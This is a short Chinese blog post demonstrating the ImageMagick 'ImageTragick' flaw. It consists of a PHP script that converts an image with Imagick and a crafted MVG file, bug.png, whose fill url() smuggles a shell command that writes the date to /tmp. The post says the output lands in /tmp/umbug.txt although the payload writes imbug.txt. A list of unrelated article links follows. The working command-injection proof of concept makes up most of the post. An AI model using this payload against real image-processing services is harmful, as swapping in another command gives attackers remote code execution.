Imagetrick 漏洞的实例
2016-05-06 11:56
453 查看
t1.php
bug.png
执行
php t1.php
然后cat /tmp/umbug.txt里面会是当前的日期。
<?php ini_set('display_errors',true); error_reporting(E_ALL); $a++; $src_img = new Imagick('bug.png'); $icon = new Imagick(); $icon->setFormat('ico'); $icon->addImage($src_img); $icon->writeImages("favicon.ico", true); $src_img->destroy(); $icon->destroy();
bug.png
push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|date>/tmp/imbug.txt|echo ")' pop graphic-context
执行
php t1.php
然后cat /tmp/umbug.txt里面会是当前的日期。
相关文章推荐
- 把开源项目打包成jar包导入到本地仓库中
- require.js的用法
- Linux主机之间权限访问与开通
- 什么是MVVM?
- 王高利:在apache2.4上配置awstats后没权限,显示源码问题,报错总结
- char a[]和char *a的比较
- 五月六日学习日志
- 核心编程答案(第六章)
- php第十三节课
- 解决 jersey javax.ws.rs.core.UriBuilder.fromUri(UriBuilder.java:119)
- iOS开发系列--网络开发
- Python 类与元类的深度挖掘 II【经验】
- 网络基础
- 解决ImportError: libmysqlclient_r.so.16: cannot open shared object file
- angularjs中ui-sref传值步骤
- Win8系统经常提示"验证你的Microsoft 帐户信息"的解决方法
- mysql 函数
- linux Rootkit
- nsight 初级使用指南
- 外地驾照迁入北京流程